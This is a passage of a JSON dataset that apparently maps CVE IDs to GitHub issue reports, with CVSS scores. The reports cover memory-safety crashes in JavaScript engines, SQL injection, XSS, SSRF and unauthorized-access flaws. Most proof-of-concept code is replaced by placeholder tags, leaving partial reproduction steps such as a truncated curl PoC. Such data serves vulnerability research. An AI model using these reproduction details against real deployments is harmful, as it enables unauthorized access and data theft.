  77017. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4936",
  77018. "Repo_new": "jerryscript-project/jerryscript",
  77019. "Issue_Created_At": "2022-01-04T06:18:34Z",
  77020. "description": "Assertion 'ecma_is_value_object (value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG ERRORTAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77021. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77022. "severity": "MEDIUM",
  77023. "baseScore": 5.5,
  77024. "impactScore": 3.6,
  77025. "exploitabilityScore": 1.8
  77026. },
  77027. {
  77028. "CVE_ID": "CVE-2021-46351",
  77029. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4940",
  77030. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4940",
  77031. "Repo_new": "jerryscript-project/jerryscript",
  77032. "Issue_Created_At": "2022-01-04T06:21:48Z",
  77033. "description": "Assertion 'local_tza == APITAG (date_value)' failed at PATHTAG APITAG APITAG revision Commit: a6ab5e9 URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG microsoft standard NUMBERTAG Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case APITAG FILETAG APITAG APITAG APITAG CODETAG APITAG APITAG APITAG \u200b Execution steps & Output ERRORTAG",
  77034. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77035. "severity": "MEDIUM",
  77036. "baseScore": 5.5,
  77037. "impactScore": 3.6,
  77038. "exploitabilityScore": 1.8
  77039. },
  77040. {
  77041. "CVE_ID": "CVE-2021-46354",
  77042. "Issue_Url_old": "https://github.com/cybelesoft/virtualui/issues/3",
  77043. "Issue_Url_new": "https://github.com/cybelesoft/virtualui/issues/3",
  77044. "Repo_new": "cybelesoft/virtualui",
  77045. "Issue_Created_At": "2022-01-11T11:40:02Z",
  77046. "description": "Vulnerability External Service Interaction. Dear Cybele Software, My name is Daniel Morales. I have found a vulnerability in Thinfinity APITAG that could allow a malicious actor to trigger a server side request to external endpoints. Summary External service interaction arises when it is possible to induce an application to interact with an arbitrary external service. The ability to send requests to other systems can allow the vulnerable server to leak the real IP of the webserver or increase the attack surface (it may be used also to leak the real IP behind a CDN) Payload An example of the HTTP request \" URLTAG APITAG APITAG APITAG APITAG where \" domain.com \" is the external endpoint to be requested. Vulnerable versions It has been tested in APITAG version NUMBERTAG and NUMBERTAG",
  77047. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  77048. "severity": "HIGH",
  77049. "baseScore": 7.5,
  77050. "impactScore": 3.6,
  77051. "exploitabilityScore": 3.9
  77052. },
  77053. {
  77054. "CVE_ID": "CVE-2021-46359",
  77055. "Issue_Url_old": "https://github.com/FISCO-BCOS/FISCO-BCOS/issues/2124",
  77056. "Issue_Url_new": "https://github.com/fisco-bcos/fisco-bcos/issues/2124",
  77057. "Repo_new": "fisco-bcos/fisco-bcos",
  77058. "Issue_Created_At": "2022-01-12T06:15:50Z",
  77059. "description": "Transactions fail to be committed and the consensus process is stuck. Describe the bug I use the testing programs to send NUMBERTAG transactions to a group with NUMBERTAG nodes, it seems that over NUMBERTAG of the transactions cannot be committed successfully. APITAG To Reproduce Steps to reproduce the behavior NUMBERTAG Setup a group with NUMBERTAG nodes, each with a small size of tx pool NUMBERTAG Constantly sending txs to the group NUMBERTAG If the tx pool of the leader node is full, the consensus process will be stuck. Expected behavior All transactions should be committed successfully. Environment (please complete the following information): OS: Ubuntu NUMBERTAG FISCO BCOS release NUMBERTAG rc2",
  77060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  77061. "severity": "HIGH",
  77062. "baseScore": 7.5,
  77063. "impactScore": 3.6,
  77064. "exploitabilityScore": 3.9
  77065. },
  77066. {
  77067. "CVE_ID": "CVE-2021-46371",
  77068. "Issue_Url_old": "https://github.com/zuiidea/antd-admin/issues/1127",
  77069. "Issue_Url_new": "https://github.com/zuiidea/antd-admin/issues/1127",
  77070. "Repo_new": "zuiidea/antd-admin",
  77071. "Issue_Created_At": "2022-01-13T01:50:22Z",
  77072. "description": "Unauthorized access to some interfaces in the foreground was found. Procedure NUMBERTAG Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information NUMBERTAG Install according to the official documents FILETAG NUMBERTAG Unauthorized access is found on some interfaces For example: PATHTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG NUMBERTAG At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information. FILETAG NUMBERTAG It can also be reproduced in the official sample site URLTAG the poc is : curl A APITAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG URLTAG FILETAG",
  77073. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  77074. "severity": "HIGH",
  77075. "baseScore": 7.5,
  77076. "impactScore": 3.6,
  77077. "exploitabilityScore": 3.9
  77078. },
  77079. {
  77080. "CVE_ID": "CVE-2021-46377",
  77081. "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/33",
  77082. "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/33",
  77083. "Repo_new": "cskaza/cszcms",
  77084. "Issue_Created_At": "2022-01-14T09:13:29Z",
  77085. "description": "Bug Report: There is a front end boolean based sql injection vulnerability. Hi, I found a front end sql injection vulnerability in cszcms NUMBERTAG The vulnerable code is on APITAG The APITAG parameter here can be controlled by the user FILETAG And no filtering leads to sql injection vulnerability FILETAG First register a user in the foreground, then log in, then visit APITAG APITAG The content returned by the webpage is: FILETAG visit APITAG APITAG The content returned by the webpage is: FILETAG It's a Boolean based SQL injection Suggest: Add a filter function to this parameter",
  77086. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77087. "severity": "CRITICAL",
  77088. "baseScore": 9.8,
  77089. "impactScore": 5.9,
  77090. "exploitabilityScore": 3.9
  77091. },
  77092. {
  77093. "CVE_ID": "CVE-2021-46433",
  77094. "Issue_Url_old": "https://github.com/fenom-template/fenom/issues/331",
  77095. "Issue_Url_new": "https://github.com/fenom-template/fenom/issues/331",
  77096. "Repo_new": "fenom-template/fenom",
  77097. "Issue_Created_At": "2022-01-19T04:45:25Z",
  77098. "description": "Security Issue. Hi, In fenom NUMBERTAG and before, there is a way to bypass the sandbox and execute arbitrary PHP code when disable_native_funcs is true.",
  77099. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  77100. "severity": "CRITICAL",
  77101. "baseScore": 10.0,
  77102. "impactScore": 6.0,
  77103. "exploitabilityScore": 3.9
  77104. },
  77105. {
  77106. "CVE_ID": "CVE-2021-46434",
  77107. "Issue_Url_old": "https://github.com/emqx/emqx/issues/6791",
  77108. "Issue_Url_new": "https://github.com/emqx/emqx/issues/6791",
  77109. "Repo_new": "emqx/emqx",
  77110. "Issue_Created_At": "2022-01-19T07:01:59Z",
  77111. "description": "Username Enumeration. APITAG APITAG APITAG Subject of the issue When a user logs in, the application returns different results depending on whether the account is correct, which allows an attacker to determine if a given username is valid. Your environment EMQ NUMBERTAG Steps to reproduce The problem lies in the \"/api NUMBERTAG auth\" interface If you log in using an existing account and the Password is incorrect, APITAG Error\" is displayed. FILETAG and APITAG Not Found\" is displayed when you log in using a non existent account. FILETAG",
  77112. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  77113. "severity": "MEDIUM",
  77114. "baseScore": 5.3,
  77115. "impactScore": 1.4,
  77116. "exploitabilityScore": 3.9
  77117. },
  77118. {
  77119. "CVE_ID": "CVE-2021-46436",
  77120. "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/1",
  77121. "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/1",
  77122. "Repo_new": "xunyang1/zzcms",
  77123. "Issue_Created_At": "2022-01-19T14:28:50Z",
  77124. "description": "ZZCMS NUMBERTAG has a SQL injection vulnerability. ZZCMS NUMBERTAG sqlinject NUMBERTAG APITAG by rerce&rpsate ZZCMS the latest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG Vulnerability code: in file FILETAG line NUMBERTAG FILETAG As shown in the picture above, parameter b is directly assigned to $b. FILETAG Then, $b is directly spliced into the SQL statement in line NUMBERTAG which leads to the SQL injection vulnerability. POC NUMBERTAG First log in to the administrator account NUMBERTAG Visit URLTAG and intercept with burp NUMBERTAG You can see that the delay is NUMBERTAG s. FILETAG",
  77125. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  77126. "severity": "HIGH",
  77127. "baseScore": 7.2,
  77128. "impactScore": 5.9,
  77129. "exploitabilityScore": 1.2
  77130. },
  77131. {
  77132. "CVE_ID": "CVE-2021-46437",
  77133. "Issue_Url_old": "https://github.com/xunyang1/ZZCMS/issues/2",
  77134. "Issue_Url_new": "https://github.com/xunyang1/zzcms/issues/2",
  77135. "Repo_new": "xunyang1/zzcms",
  77136. "Issue_Created_At": "2022-01-19T15:30:55Z",
  77137. "description": "ZZCMS NUMBERTAG has a xss vulnerability. ZZCMS NUMBERTAG SS NUMBERTAG APITAG by rerce&rpsate ZZCMS the latest version download page : FILETAG Environmental requirements PHP version NUMBERTAG Mysql version NUMBERTAG Vulnerability code: In the file APITAG line APITAG variable APITAG can be controlled by the APITAG ,then output on line NUMBERTAG and it is not filtered. FILETAG POC NUMBERTAG First log in to the administrator account NUMBERTAG Visit ERRORTAG NUMBERTAG you will see a popup. FILETAG",
  77138. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  77139. "severity": "MEDIUM",
  77140. "baseScore": 4.8,
  77141. "impactScore": 2.7,
  77142. "exploitabilityScore": 1.7
  77143. },
  77144. {
  77145. "CVE_ID": "CVE-2021-46461",
  77146. "Issue_Url_old": "https://github.com/nginx/njs/issues/450",
  77147. "Issue_Url_new": "https://github.com/nginx/njs/issues/450",
  77148. "Repo_new": "nginx/njs",
  77149. "Issue_Created_At": "2021-12-24T06:33:59Z",
  77150. "description": "illegal memcpy during njs_vmcode_typeof in PATHTAG Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  77151. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77152. "severity": "CRITICAL",
  77153. "baseScore": 9.8,
  77154. "impactScore": 5.9,
  77155. "exploitabilityScore": 3.9
  77156. },
  77157. {
  77158. "CVE_ID": "CVE-2021-46462",
  77159. "Issue_Url_old": "https://github.com/nginx/njs/issues/449",
  77160. "Issue_Url_new": "https://github.com/nginx/njs/issues/449",
  77161. "Repo_new": "nginx/njs",
  77162. "Issue_Created_At": "2021-12-24T06:28:54Z",
  77163. "description": "SEGV PATHTAG in njs_object_set_prototype. Env CODETAG POC ERRORTAG Stack Dump ERRORTAG Credit P1umer, afang NUMBERTAG Kotori of APITAG",
  77164. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  77165. "severity": "HIGH",
  77166. "baseScore": 7.5,
  77167. "impactScore": 3.6,
  77168. "exploitabilityScore": 3.9
  77169. },
  77170. {
  77171. "CVE_ID": "CVE-2021-46463",
  77172. "Issue_Url_old": "https://github.com/nginx/njs/issues/447",
  77173. "Issue_Url_new": "https://github.com/nginx/njs/issues/447",
  77174. "Repo_new": "nginx/njs",
  77175. "Issue_Created_At": "2021-12-20T05:07:22Z",
  77176. "description": "Control flow hijack caused by Type Confusion of Promise object. Env CODETAG Poc ERRORTAG Analysis The output of the above poc is as follows: APITAG If I comment out APITAG ERRORTAG Then the output will be normal as follows: APITAG This is because APITAG has Type Confusion vuln when dealing with promise objects. The code APITAG will write the integer APITAG to APITAG field of data that has been confused as APITAG , although data may be of other types actually. CODETAG Therefore, when we try to change the data to the Symbol type: ERRORTAG The following error will be reported as expected: ERRORTAG We deliberately introduce the non writable APITAG to prove the validity of the vulnerability. Of course, this primitive can be used to confuse OTHER types of objects, and combined with heap spray technology to achieve control flow hijacking. Found by P1umer, Kotori, afang NUMBERTAG IIE Varas",
  77177. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  77178. "severity": "CRITICAL",
  77179. "baseScore": 9.8,
  77180. "impactScore": 5.9,
  77181. "exploitabilityScore": 3.9
  77182. },
  77183. {
  77184. "CVE_ID": "CVE-2021-46474",
  77185. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/57",
  77186. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/57",
  77187. "Repo_new": "pcmacdon/jsish",
  77188. "Issue_Created_At": "2021-12-24T09:47:27Z",
  77189. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77190. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77191. "severity": "MEDIUM",
  77192. "baseScore": 5.5,
  77193. "impactScore": 3.6,
  77194. "exploitabilityScore": 1.8
  77195. },
  77196. {
  77197. "CVE_ID": "CVE-2021-46475",
  77198. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/64",
  77199. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/64",
  77200. "Repo_new": "pcmacdon/jsish",
  77201. "Issue_Created_At": "2021-12-24T10:33:23Z",
  77202. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77204. "severity": "MEDIUM",
  77205. "baseScore": 5.5,
  77206. "impactScore": 3.6,
  77207. "exploitabilityScore": 1.8
  77208. },
  77209. {
  77210. "CVE_ID": "CVE-2021-46477",
  77211. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/63",
  77212. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/63",
  77213. "Repo_new": "pcmacdon/jsish",
  77214. "Issue_Created_At": "2021-12-24T10:32:32Z",
  77215. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77217. "severity": "MEDIUM",
  77218. "baseScore": 5.5,
  77219. "impactScore": 3.6,
  77220. "exploitabilityScore": 1.8
  77221. },
  77222. {
  77223. "CVE_ID": "CVE-2021-46478",
  77224. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/60",
  77225. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/60",
  77226. "Repo_new": "pcmacdon/jsish",
  77227. "Issue_Created_At": "2021-12-24T09:50:51Z",
  77228. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77229. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77230. "severity": "MEDIUM",
  77231. "baseScore": 5.5,
  77232. "impactScore": 3.6,
  77233. "exploitabilityScore": 1.8
  77234. },
  77235. {
  77236. "CVE_ID": "CVE-2021-46480",
  77237. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/61",
  77238. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/61",
  77239. "Repo_new": "pcmacdon/jsish",
  77240. "Issue_Created_At": "2021-12-24T10:30:42Z",
  77241. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77242. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77243. "severity": "MEDIUM",
  77244. "baseScore": 5.5,
  77245. "impactScore": 3.6,
  77246. "exploitabilityScore": 1.8
  77247. },
  77248. {
  77249. "CVE_ID": "CVE-2021-46481",
  77250. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/55",
  77251. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/55",
  77252. "Repo_new": "pcmacdon/jsish",
  77253. "Issue_Created_At": "2021-12-24T09:44:48Z",
  77254. "description": "Memory leaks in linenoise APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77255. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77256. "severity": "MEDIUM",
  77257. "baseScore": 5.5,
  77258. "impactScore": 3.6,
  77259. "exploitabilityScore": 1.8
  77260. },
  77261. {
  77262. "CVE_ID": "CVE-2021-46482",
  77263. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/66",
  77264. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/66",
  77265. "Repo_new": "pcmacdon/jsish",
  77266. "Issue_Created_At": "2021-12-24T10:35:07Z",
  77267. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77268. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77269. "severity": "HIGH",
  77270. "baseScore": 7.8,
  77271. "impactScore": 5.9,
  77272. "exploitabilityScore": 1.8
  77273. },
  77274. {
  77275. "CVE_ID": "CVE-2021-46483",
  77276. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/62",
  77277. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/62",
  77278. "Repo_new": "pcmacdon/jsish",
  77279. "Issue_Created_At": "2021-12-24T10:31:27Z",
  77280. "description": "Heap buffer overflow APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77281. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  77282. "severity": "HIGH",
  77283. "baseScore": 7.8,
  77284. "impactScore": 5.9,
  77285. "exploitabilityScore": 1.8
  77286. },
  77287. {
  77288. "CVE_ID": "CVE-2021-46484",
  77289. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/73",
  77290. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/73",
  77291. "Repo_new": "pcmacdon/jsish",
  77292. "Issue_Created_At": "2021-12-24T10:41:10Z",
  77293. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 ERRORTAG Test case2 ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77294. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77295. "severity": "MEDIUM",
  77296. "baseScore": 5.5,
  77297. "impactScore": 3.6,
  77298. "exploitabilityScore": 1.8
  77299. },
  77300. {
  77301. "CVE_ID": "CVE-2021-46485",
  77302. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/70",
  77303. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/70",
  77304. "Repo_new": "pcmacdon/jsish",
  77305. "Issue_Created_At": "2021-12-24T10:38:22Z",
  77306. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77307. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77308. "severity": "MEDIUM",
  77309. "baseScore": 5.5,
  77310. "impactScore": 3.6,
  77311. "exploitabilityScore": 1.8
  77312. },
  77313. {
  77314. "CVE_ID": "CVE-2021-46486",
  77315. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/65",
  77316. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/65",
  77317. "Repo_new": "pcmacdon/jsish",
  77318. "Issue_Created_At": "2021-12-24T10:34:07Z",
  77319. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case CODETAG \u200b Execution steps & Output ERRORTAG",
  77320. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77321. "severity": "MEDIUM",
  77322. "baseScore": 5.5,
  77323. "impactScore": 3.6,
  77324. "exploitabilityScore": 1.8
  77325. },
  77326. {
  77327. "CVE_ID": "CVE-2021-46487",
  77328. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/72",
  77329. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/72",
  77330. "Repo_new": "pcmacdon/jsish",
  77331. "Issue_Created_At": "2021-12-24T10:39:45Z",
  77332. "description": "SEGV ( PATHTAG ). Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77333. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77334. "severity": "MEDIUM",
  77335. "baseScore": 5.5,
  77336. "impactScore": 3.6,
  77337. "exploitabilityScore": 1.8
  77338. },
  77339. {
  77340. "CVE_ID": "CVE-2021-46488",
  77341. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/68",
  77342. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/68",
  77343. "Repo_new": "pcmacdon/jsish",
  77344. "Issue_Created_At": "2021-12-24T10:36:54Z",
  77345. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77346. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77347. "severity": "MEDIUM",
  77348. "baseScore": 5.5,
  77349. "impactScore": 3.6,
  77350. "exploitabilityScore": 1.8
  77351. },
  77352. {
  77353. "CVE_ID": "CVE-2021-46489",
  77354. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/74",
  77355. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/74",
  77356. "Repo_new": "pcmacdon/jsish",
  77357. "Issue_Created_At": "2021-12-24T10:41:50Z",
  77358. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77359. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77360. "severity": "MEDIUM",
  77361. "baseScore": 5.5,
  77362. "impactScore": 3.6,
  77363. "exploitabilityScore": 1.8
  77364. },
  77365. {
  77366. "CVE_ID": "CVE-2021-46490",
  77367. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/67",
  77368. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/67",
  77369. "Repo_new": "pcmacdon/jsish",
  77370. "Issue_Created_At": "2021-12-24T10:35:45Z",
  77371. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77372. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77373. "severity": "MEDIUM",
  77374. "baseScore": 5.5,
  77375. "impactScore": 3.6,
  77376. "exploitabilityScore": 1.8
  77377. },
  77378. {
  77379. "CVE_ID": "CVE-2021-46491",
  77380. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/69",
  77381. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/69",
  77382. "Repo_new": "pcmacdon/jsish",
  77383. "Issue_Created_At": "2021-12-24T10:37:33Z",
  77384. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case APITAG \u200b Execution steps & Output ERRORTAG",
  77385. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77386. "severity": "MEDIUM",
  77387. "baseScore": 5.5,
  77388. "impactScore": 3.6,
  77389. "exploitabilityScore": 1.8
  77390. },
  77391. {
  77392. "CVE_ID": "CVE-2021-46492",
  77393. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/71",
  77394. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/71",
  77395. "Repo_new": "pcmacdon/jsish",
  77396. "Issue_Created_At": "2021-12-24T10:38:56Z",
  77397. "description": "SEGV APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case1 APITAG Test case2 ERRORTAG Execution steps & Output ERRORTAG",
  77398. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77399. "severity": "MEDIUM",
  77400. "baseScore": 5.5,
  77401. "impactScore": 3.6,
  77402. "exploitabilityScore": 1.8
  77403. },
  77404. {
  77405. "CVE_ID": "CVE-2021-46494",
  77406. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/78",
  77407. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/78",
  77408. "Repo_new": "pcmacdon/jsish",
  77409. "Issue_Created_At": "2021-12-24T10:45:48Z",
  77410. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77411. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77412. "severity": "MEDIUM",
  77413. "baseScore": 5.5,
  77414. "impactScore": 3.6,
  77415. "exploitabilityScore": 1.8
  77416. },
  77417. {
  77418. "CVE_ID": "CVE-2021-46495",
  77419. "Issue_Url_old": "https://github.com/pcmacdon/jsish/issues/82",
  77420. "Issue_Url_new": "https://github.com/pcmacdon/jsish/issues/82",
  77421. "Repo_new": "pcmacdon/jsish",
  77422. "Issue_Created_At": "2021-12-24T10:48:59Z",
  77423. "description": "Heap use after free APITAG in APITAG Jsish revision Commit NUMBERTAG fa NUMBERTAG e URLTAG Version NUMBERTAG Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps APITAG Test case ERRORTAG \u200b Execution steps & Output ERRORTAG",
  77424. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  77425. "severity": "MEDIUM",
  77426. "baseScore": 5.5,
  77427. "impactScore": 3.6,
  77428. "exploitabilityScore": 1.8
  77429. },
  77430. {
